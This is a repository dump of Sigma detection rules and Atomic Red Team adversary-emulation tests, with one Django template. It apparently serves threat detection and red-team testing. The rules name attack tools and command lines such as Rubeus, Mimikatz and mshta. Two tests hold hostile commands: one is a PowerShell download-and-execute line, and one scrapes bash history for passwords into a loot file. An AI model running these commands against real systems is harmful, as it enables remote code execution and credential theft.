whitelisting bypass via bginfo 2 | id: aaf46cdc-934e-4284-b329-34aa701e3771 3 | status: experimental 4 | description: Execute VBscript code that is referenced within the *.bgi file. 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml 7 | - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ 8 | author: Beyu Denis, oscd.community 9 | date: 2019/10/26 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: medium 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\bginfo.exe' 22 | CommandLine|contains|all: 23 | - '/popup' 24 | - '/nolicprompt' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_dxcap.yml: -------------------------------------------------------------------------------- 1 | title: Application Whitelisting bypass via dxcap.exe 2 | id: 60f16a96-db70-42eb-8f76-16763e333590 3 | status: experimental 4 | description: Detects execution of of Dxcap.exe 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml 7 | - https://twitter.com/harr0ey/status/992008180904419328 8 | author: Beyu Denis, oscd.community 9 | date: 2019/10/26 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: medium 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\dxcap.exe' 22 | CommandLine|contains|all: 23 | - '-c' 24 | - '.exe' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate execution of dxcap.exe by legitimate user 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_outlook.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Execution from Outlook 2 | id: e212d415-0e93-435f-9e1a-f29005bb4723 3 | status: experimental 4 | description: Detects EnableUnsafeClientMailRules used for Script Execution from Outlook 5 | references: 6 | - https://github.com/sensepost/ruler 7 | - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html 8 | tags: 9 | - attack.execution 10 | - attack.t1059 11 | - attack.t1202 12 | author: Markus Neis 13 | date: 2018/12/27 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | clientMailRules: 19 | CommandLine: '*EnableUnsafeClientMailRules*' 20 | outlookExec: 21 | ParentImage: '*\outlook.exe' 22 | CommandLine: \\\\*\\*.exe 23 | condition: clientMailRules or outlookExec 24 | falsepositives: 25 | - unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_rc4_kerberos.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Kerberos RC4 Ticket Encryption 2 | id: 496a0e47-0a33-4dca-b009-9e6ca3591f39 3 | status: experimental 4 | references: 5 | - https://adsecurity.org/?p=3458 6 | - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity 7 | tags: 8 | - attack.credential_access 9 | - attack.t1208 10 | description: Detects service ticket requests using RC4 encryption type 11 | logsource: 12 | product: windows 13 | service: security 14 | detection: 15 | selection: 16 | EventID: 4769 17 | TicketOptions: '0x40810000' 18 | TicketEncryptionType: '0x17' 19 | reduction: 20 | - ServiceName: '$*' 21 | condition: selection and not reduction 22 | falsepositives: 23 | - Service accounts used on legacy systems (e.g. NetApp) 24 | - Windows Domains with DFL 2003 and legacy systems 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_empiremonkey.yml: -------------------------------------------------------------------------------- 1 | action: global 2 | title: Empire Monkey 3 | id: 10152a7b-b566-438f-a33c-390b607d1c8d 4 | description: Detects EmpireMonkey APT reported Activity 5 | references: 6 | - https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b 7 | tags: 8 | - attack.t1086 9 | - attack.execution 10 | date: 2019/04/02 11 | author: Markus Neis 12 | detection: 13 | condition: 1 of them 14 | falsepositives: 15 | - Very Unlikely 16 | level: critical 17 | --- 18 | logsource: 19 | category: process_creation 20 | product: windows 21 | detection: 22 | selection_cutil: 23 | CommandLine: 24 | - '*/i:%APPDATA%\logs.txt scrobj.dll' 25 | Image: 26 | - '*\cutil.exe' 27 | selection_regsvr32: 28 | CommandLine: 29 | - '*/i:%APPDATA%\logs.txt scrobj.dll' 30 | Description: 31 | - Microsoft(C) Registerserver 32 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_cdb.yml: -------------------------------------------------------------------------------- 1 | title: Possible Application Whitelisting Bypass via WinDbg/CDB as a shellcode runner 2 | id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2 3 | status: experimental 4 | description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml 7 | - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html 8 | author: Beyu Denis, oscd.community 9 | date: 2019/10/26 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: medium 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\cdb.exe' 22 | CommandLine|contains: '-cf' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate use of debugging tools 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_user_creation.yml: -------------------------------------------------------------------------------- 1 | title: Detects local user creation 2 | id: 66b6be3d-55d0-4f47-9855-d69df21740ea 3 | description: Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows 4 | server logs and not on your DC logs. 5 | status: experimental 6 | tags: 7 | - attack.persistence 8 | - attack.t1136 9 | references: 10 | - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/ 11 | author: Patrick Bareiss 12 | logsource: 13 | product: windows 14 | service: security 15 | detection: 16 | selection: 17 | EventID: 4720 18 | condition: selection 19 | fields: 20 | - EventCode 21 | - AccountName 22 | - AccountDomain 23 | falsepositives: 24 | - Domain Controller Logs 25 | - Local accounts managed by privileged account management tools 26 | level: low 27 | 28 | 29 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1114.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1114 3 | display_name: Email Collection 4 | attack_link: https://attack.mitre.org/wiki/Technique/T1114 5 | 6 | atomic_tests: 7 | - name: T1114 Email Collection with PowerShell 8 | 9 | description: | 10 | Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. 11 | 12 | supported_platforms: 13 | - windows 14 | 15 | executor: 16 | name: command_prompt 17 | elevation_required: false 18 | command: | 19 | Display email contents in the terminal 20 | PS C:\> .\Get-Inbox.ps1 21 | 22 | Write emails out to a CSV 23 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv" 24 | 25 | Download and Execute 26 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')" 27 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1143.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1143 3 | display_name: Hidden Window 4 | 5 | atomic_tests: 6 | - name: Hidden Window 7 | description: | 8 | Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | powershell_command: 15 | description: Command to launch calc.exe from a hidden PowerShell Window 16 | type: String 17 | default: powershell.exe -WindowStyle hidden calc.exe 18 | powershell_process_name: 19 | description: Name of the created process 20 | type: string 21 | default: calculator 22 | 23 | executor: 24 | name: powershell 25 | elevation_required: false 26 | command: | 27 | Start-Process #{powershell_command} 28 | cleanup_command: | 29 | Stop-Process -Name "#{powershell_process_name}" -------------------------------------------------------------------------------- /elemental/media/sigma_rules/lnx_auditd_user_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Owner or User Discovery 2 | id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 3 | status: experimental 4 | description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not 5 | the adversary fully infects the target and/or attempts specific actions. 6 | author: Timur Zinniatullin, oscd.community 7 | date: 2019/10/21 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml 10 | logsource: 11 | product: linux 12 | service: auditd 13 | detection: 14 | selection: 15 | type: 'EXECVE' 16 | a0: 17 | - 'users' 18 | - 'w' 19 | - 'who' 20 | condition: selection 21 | falsepositives: 22 | - Admin activity 23 | level: low 24 | tags: 25 | - attack.discovery 26 | - attack.t1033 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_win_binary_github_com.yml: -------------------------------------------------------------------------------- 1 | title: Microsoft Binary Github Communication 2 | id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153 3 | status: experimental 4 | description: Detects an executable in the Windows folder accessing github.com 5 | references: 6 | - https://twitter.com/M_haggis/status/900741347035889665 7 | - https://twitter.com/M_haggis/status/1032799638213066752 8 | author: Michael Haag (idea), Florian Roth (rule) 9 | tags: 10 | - attack.lateral_movement 11 | - attack.t1105 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 3 18 | Initiated: 'true' 19 | DestinationHostname: 20 | - '*.github.com' 21 | - '*.githubusercontent.com' 22 | Image: 'C:\Windows\\*' 23 | condition: selection 24 | falsepositives: 25 | - 'Unknown' 26 | - '@subTee in your network' 27 | level: high 28 | 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_admin_rdp_login.yml: -------------------------------------------------------------------------------- 1 | title: Admin User Remote Logon 2 | id: 0f63e1ef-1eb9-4226-9d54-8927ca08520a 3 | description: Detect remote login by Administrator user depending on internal pattern 4 | references: 5 | - https://car.mitre.org/wiki/CAR-2016-04-005 6 | tags: 7 | - attack.lateral_movement 8 | - attack.t1078 9 | - car.2016-04-005 10 | status: experimental 11 | author: juju4 12 | logsource: 13 | product: windows 14 | service: security 15 | definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: "Admin-*"), internal policy mandating use only as secondary account' 16 | detection: 17 | selection: 18 | EventID: 4624 19 | LogonType: 10 20 | AuthenticationPackageName: Negotiate 21 | AccountName: 'Admin-*' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative activity 25 | level: low 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_add_sid_history.yml: -------------------------------------------------------------------------------- 1 | title: Addition of SID History to Active Directory Object 2 | id: 2632954e-db1c-49cb-9936-67d1ef1d17d2 3 | status: stable 4 | description: An attacker can use the SID history attribute to gain additional privileges. 5 | references: 6 | - https://adsecurity.org/?p=1772 7 | author: Thomas Patzke, @atc_project (improvements) 8 | tags: 9 | - attack.persistence 10 | - attack.privilege_escalation 11 | - attack.t1178 12 | logsource: 13 | product: windows 14 | service: security 15 | detection: 16 | selection1: 17 | EventID: 18 | - 4765 19 | - 4766 20 | selection2: 21 | EventID: 4738 22 | selection3: 23 | SidHistory: 24 | - '-' 25 | - '%%1793' 26 | condition: selection1 or (selection2 and not selection3) 27 | falsepositives: 28 | - Migration of an account into a new domain 29 | level: medium 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_control_dll_load.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Control Panel DLL Load 2 | id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 3 | status: experimental 4 | description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits 5 | author: Florian Roth 6 | date: 2017/04/15 7 | references: 8 | - https://twitter.com/rikvduijn/status/853251879320662017 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1073 12 | - attack.t1085 13 | - car.2013-10-002 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | ParentImage: '*\System32\control.exe' 20 | CommandLine: '*\rundll32.exe *' 21 | filter: 22 | CommandLine: '*Shell32.dll*' 23 | condition: selection and not filter 24 | fields: 25 | - CommandLine 26 | - ParentCommandLine 27 | falsepositives: 28 | - Unknown 29 | level: high 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_dns_config.yml: -------------------------------------------------------------------------------- 1 | title: DNS Server Error Failed Loading the ServerLevelPluginDLL 2 | id: cbe51394-cd93-4473-b555-edf0144952d9 3 | description: This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded 4 | status: experimental 5 | date: 2017/05/08 6 | references: 7 | - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 8 | - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx 9 | - https://twitter.com/gentilkiwi/status/861641945944391680 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1073 13 | author: Florian Roth 14 | logsource: 15 | product: windows 16 | service: dns-server 17 | detection: 18 | selection: 19 | EventID: 20 | - 150 21 | - 770 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | level: critical 26 | 27 | 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/crime_fireball.yml: -------------------------------------------------------------------------------- 1 | title: Fireball Archer Install 2 | id: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d 3 | status: experimental 4 | description: Detects Archer malware invocation via rundll32 5 | author: Florian Roth 6 | date: 2017/06/03 7 | references: 8 | - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/ 9 | - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100 10 | tags: 11 | - attack.execution 12 | - attack.t1059 13 | - attack.defense_evasion 14 | - attack.t1085 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | detection: 19 | selection: 20 | CommandLine: '*\rundll32.exe *,InstallArcherSvc' 21 | condition: selection 22 | fields: 23 | - CommandLine 24 | - ParentCommandLine 25 | falsepositives: 26 | - Unknown 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_execution_path.yml: -------------------------------------------------------------------------------- 1 | title: Execution in Non-Executable Folder 2 | id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4 3 | status: experimental 4 | description: Detects a suspicious exection from an uncommon folder 5 | author: Florian Roth 6 | tags: 7 | - attack.defense_evasion 8 | - attack.t1036 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | Image: 15 | - '*\$Recycle.bin' 16 | - '*\Users\All Users\\*' 17 | - '*\Users\Default\\*' 18 | - '*\Users\Public\\*' 19 | - 'C:\Perflogs\\*' 20 | - '*\config\systemprofile\\*' 21 | - '*\Windows\Fonts\\*' 22 | - '*\Windows\IME\\*' 23 | - '*\Windows\addins\\*' 24 | condition: selection 25 | fields: 26 | - CommandLine 27 | - ParentCommandLine 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_sdelete.yml: -------------------------------------------------------------------------------- 1 | title: Secure Deletion with SDelete 2 | id: 39a80702-d7ca-4a83-b776-525b1f86a36d 3 | status: experimental 4 | description: Detects renaming of file while deletion with SDelete tool 5 | author: Thomas Patzke 6 | references: 7 | - https://jpcertcc.github.io/ToolAnalysisResultSheet 8 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html 9 | - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1107 13 | - attack.t1066 14 | - attack.s0195 15 | logsource: 16 | product: windows 17 | service: security 18 | detection: 19 | selection: 20 | EventID: 21 | - 4656 22 | - 4663 23 | - 4658 24 | ObjectName: 25 | - '*.AAA' 26 | - '*.ZZZ' 27 | condition: selection 28 | falsepositives: 29 | - Legitime usage of SDelete 30 | level: medium 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_wmi_spwns_powershell.yml: -------------------------------------------------------------------------------- 1 | title: WMI Spawning Windows PowerShell 2 | id: 692f0bec-83ba-4d04-af7e-e884a96059b6 3 | status: experimental 4 | description: Detects WMI spawning PowerShell 5 | references: 6 | - https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml 7 | - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e 8 | author: Markus Neis / @Karneades 9 | date: 2019/04/03 10 | tags: 11 | - attack.execution 12 | - attack.defense_evasion 13 | - attack.t1064 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | ParentImage: 20 | - '*\wmiprvse.exe' 21 | Image: 22 | - '*\powershell.exe' 23 | condition: selection 24 | falsepositives: 25 | - AppvClient 26 | - CCM 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1139.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1139 3 | display_name: Bash History 4 | 5 | atomic_tests: 6 | - name: Search Through Bash History 7 | description: | 8 | Search through bash history for specifice commands we want to capture 9 | supported_platforms: 10 | - linux 11 | - macos 12 | input_arguments: 13 | bash_history_filename: 14 | description: Path of the bash history file to capture 15 | type: Path 16 | default: ~/.bash_history 17 | bash_history_grep_args: 18 | description: grep arguments that filter out specific commands we want to capture 19 | type: Path 20 | default: -e '-p ' -e 'pass' -e 'ssh' 21 | output_file: 22 | description: Path where captured results will be placed 23 | type: Path 24 | default: ~/loot.txt 25 | executor: 26 | name: sh 27 | command: | 28 | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/av_password_dumper.yml: -------------------------------------------------------------------------------- 1 | title: Antivirus Password Dumper Detection 2 | id: 78cc2dd2-7d20-4d32-93ff-057084c38b93 3 | description: Detects a highly relevant Antivirus alert that reports a password dumper 4 | date: 2018/09/09 5 | modified: 2019/10/04 6 | author: Florian Roth 7 | references: 8 | - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/ 9 | tags: 10 | - attack.credential_access 11 | - attack.t1003 12 | logsource: 13 | product: antivirus 14 | detection: 15 | selection: 16 | Signature: 17 | - "*DumpCreds*" 18 | - "*Mimikatz*" 19 | - "*PWCrack*" 20 | - "HTool/WCE" 21 | - "*PSWtool*" 22 | - "*PWDump*" 23 | - "*SecurityTool*" 24 | - "*PShlSpy*" 25 | condition: selection 26 | fields: 27 | - FileName 28 | - User 29 | falsepositives: 30 | - Unlikely 31 | level: critical 32 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_prog_location_process_starts.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Program Location Process Starts 2 | id: f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5 3 | status: experimental 4 | description: Detects programs running in suspicious files system locations 5 | references: 6 | - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo 7 | tags: 8 | - attack.defense_evasion 9 | - attack.t1036 10 | author: Florian Roth 11 | date: 2019/01/15 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | Image: 18 | - '*\$Recycle.bin' 19 | - '*\Users\Public\\*' 20 | - 'C:\Perflogs\\*' 21 | - '*\Windows\Fonts\\*' 22 | - '*\Windows\IME\\*' 23 | - '*\Windows\addins\\*' 24 | - '*\Windows\debug\\*' 25 | condition: selection 26 | falsepositives: 27 | - unknown 28 | level: high 29 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/tactic_list.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | {% block content %} 4 |

Tactic List FROM THE TACTIC_LIST HEML PAGEEE

5 | {% if total_tactics %} 6 |
7 | 8 | 9 | 16 | 17 | {% endfor %} 18 |   19 | 20 |
10 | {% for tactic in total_tactics %} 11 | {{ tactic.tactic_name }} 12 | {% for tech in techfortactics %} 13 | {{ tech.technique_id }} 14 | {% endfor %} 15 |
21 |
22 | {% else %} 23 |

There are no Tactics for this mother.

24 | {% endif %} 25 | {% endblock %} -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_atsvc_task.yml: -------------------------------------------------------------------------------- 1 | title: Remote Task Creation via ATSVC named pipe 2 | id: f6de6525-4509-495a-8a82-1f8b0ed73a00 3 | description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe 4 | author: Samir Bousseaden 5 | references: 6 | - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html 7 | tags: 8 | - attack.lateral_movement 9 | - attack.persistence 10 | - attack.t1053 11 | - car.2013-05-004 12 | - car.2015-04-001 13 | logsource: 14 | product: windows 15 | service: security 16 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure' 17 | detection: 18 | selection: 19 | EventID: 5145 20 | ShareName: \\*\IPC$ 21 | RelativeTargetName: atsvc 22 | Accesses: '*WriteData*' 23 | condition: selection 24 | falsepositives: 25 | - pentesting 26 | level: medium 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_overpass_the_hash.yml: -------------------------------------------------------------------------------- 1 | title: Successful Overpass the Hash Attempt 2 | id: 192a0330-c20b-4356-90b6-7b7049ae0b87 3 | status: experimental 4 | description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. 5 | references: 6 | - https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html 7 | author: Roberto Rodriguez (source), Dominik Schaudel (rule) 8 | date: 2018/02/12 9 | tags: 10 | - attack.lateral_movement 11 | - attack.t1075 12 | - attack.s0002 13 | logsource: 14 | product: windows 15 | service: security 16 | detection: 17 | selection: 18 | EventID: 4624 19 | LogonType: 9 20 | LogonProcessName: seclogo 21 | AuthenticationPackageName: Negotiate 22 | condition: selection 23 | falsepositives: 24 | - Runas command-line tool using /netonly parameter 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_registry_persistence_key_linking.yml: -------------------------------------------------------------------------------- 1 | title: Windows Registry Persistence - COM key linking 2 | id: 9b0f8a61-91b2-464f-aceb-0527e0a45020 3 | status: experimental 4 | description: Detects COM object hijacking via TreatAs subkey 5 | references: 6 | - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ 7 | author: Kutepov Anton, oscd.community 8 | date: 2019/10/23 9 | modified: 2019/11/07 10 | tags: 11 | - attack.persistence 12 | - attack.t1122 13 | logsource: 14 | product: windows 15 | service: sysmon 16 | detection: 17 | selection: 18 | EventID: 12 19 | TargetObject|startswith: 'HKU\' 20 | TargetObject|contains: '_Classes\CLSID\' 21 | TargetObject|endswith: '\TreatAs' 22 | condition: selection 23 | falsepositives: 24 | - Maybe some system utilities in rare cases use linking keys for backward compability 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/web_cve_2018_2894_weblogic_exploit.yml: -------------------------------------------------------------------------------- 1 | title: Oracle WebLogic Exploit 2 | id: 37e8369b-43bb-4bf8-83b6-6dd43bda2000 3 | description: Detects access to a webshell droped into a keytore folder on the WebLogic server 4 | author: Florian Roth 5 | date: 2018/07/22 6 | status: experimental 7 | references: 8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 9 | - https://twitter.com/pyn3rd/status/1020620932967223296 10 | - https://github.com/LandGrey/CVE-2018-2894 11 | logsource: 12 | category: webserver 13 | detection: 14 | selection: 15 | c-uri-path: 16 | - '*/config/keystore/*.js*' 17 | condition: selection 18 | fields: 19 | - c-ip 20 | - c-dns 21 | falsepositives: 22 | - Unknown 23 | tags: 24 | - attack.t1100 25 | - attack.t1190 26 | - attack.initial_access 27 | - attack.persistence 28 | - attack.privilege_escalation 29 | - cve.2018-2894 30 | level: critical 31 | 32 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_powershell_dll_execution.yml: -------------------------------------------------------------------------------- 1 | title: Detection of PowerShell Execution via DLL 2 | id: 6812a10b-60ea-420c-832f-dfcc33b646ba 3 | status: experimental 4 | description: Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll 5 | references: 6 | - https://github.com/p3nt4/PowerShdll/blob/master/README.md 7 | tags: 8 | - attack.execution 9 | - attack.t1086 10 | - car.2014-04-003 11 | author: Markus Neis 12 | date: 2018/08/25 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection1: 18 | Image: 19 | - '*\rundll32.exe' 20 | selection2: 21 | Description: 22 | - '*Windows-Hostprozess (Rundll32)*' 23 | selection3: 24 | CommandLine: 25 | - '*Default.GetString*' 26 | - '*FromBase64String*' 27 | condition: (selection1 or selection2) and selection3 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_devtoolslauncher.yml: -------------------------------------------------------------------------------- 1 | title: Devtoolslauncher.exe executes specified binary 2 | id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 3 | status: experimental 4 | description: The Devtoolslauncher.exe executes other binary 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml 7 | - https://twitter.com/_felamos/status/1179811992841797632 8 | author: Beyu Denis, oscd.community (rule), @_felamos (idea) 9 | date: 2019/10/12 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: critical 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\devtoolslauncher.exe' 22 | CommandLine|contains: 'LaunchForDeploy' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate use of devtoolslauncher.exe by legitimate user 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_hack_rubeus.yml: -------------------------------------------------------------------------------- 1 | title: Rubeus Hack Tool 2 | id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 3 | description: Detects command line parameters used by Rubeus hack tool 4 | author: Florian Roth 5 | references: 6 | - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/ 7 | date: 2018/12/19 8 | tags: 9 | - attack.credential_access 10 | - attack.t1003 11 | - attack.s0005 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: 18 | - '* asreproast *' 19 | - '* dump /service:krbtgt *' 20 | - '* kerberoast *' 21 | - '* createnetonly /program:*' 22 | - '* ptt /ticket:*' 23 | - '* /impersonateuser:*' 24 | - '* renew /ticket:*' 25 | - '* asktgt /user:*' 26 | - '* harvest /interval:*' 27 | condition: selection 28 | falsepositives: 29 | - unlikely 30 | level: critical 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_babyshark.yml: -------------------------------------------------------------------------------- 1 | title: Baby Shark Activity 2 | id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35 3 | status: experimental 4 | description: Detects activity that could be related to Baby Shark malware 5 | references: 6 | - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ 7 | tags: 8 | - attack.execution 9 | - attack.t1059 10 | - attack.t1086 11 | - attack.discovery 12 | - attack.t1012 13 | - attack.defense_evasion 14 | - attack.t1170 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | author: Florian Roth 19 | date: 2019/02/24 20 | detection: 21 | selection: 22 | CommandLine: 23 | - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 24 | - powershell.exe mshta.exe http* 25 | - cmd.exe /c taskkill /im cmd.exe 26 | condition: selection 27 | falsepositives: 28 | - unknown 29 | level: high 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_rundll32_by_ordinal.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Call by Ordinal 2 | id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c 3 | description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal 4 | status: experimental 5 | references: 6 | - https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/ 7 | - https://github.com/Neo23x0/DLLRunner 8 | - https://twitter.com/cyb3rops/status/1186631731543236608 9 | tags: 10 | - attack.defense_evasion 11 | - attack.execution 12 | - attack.t1085 13 | author: Florian Roth 14 | date: 2019/10/22 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | detection: 19 | selection: 20 | CommandLine: '*\rundll32.exe *,#*' 21 | condition: selection 22 | falsepositives: 23 | - False positives depend on scripts and administrative tools used in the monitored environment 24 | - Windows contol panel elements have been identified as source (mmc) 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/proxy_raw_paste_service_access.yml: -------------------------------------------------------------------------------- 1 | title: Raw Paste Service Access 2 | id: 5468045b-4fcc-4d1a-973c-c9c9578edacb 3 | status: experimental 4 | description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form 5 | references: 6 | - https://www.virustotal.com/gui/domain/paste.ee/relations 7 | author: Florian Roth 8 | date: 2019/12/05 9 | tags: 10 | - attack.t1102 11 | - attack.defense_evasion 12 | logsource: 13 | category: proxy 14 | detection: 15 | selection: 16 | c-uri|contains: 17 | - '.paste.ee/r/' 18 | - '.pastebin.com/raw/' 19 | - 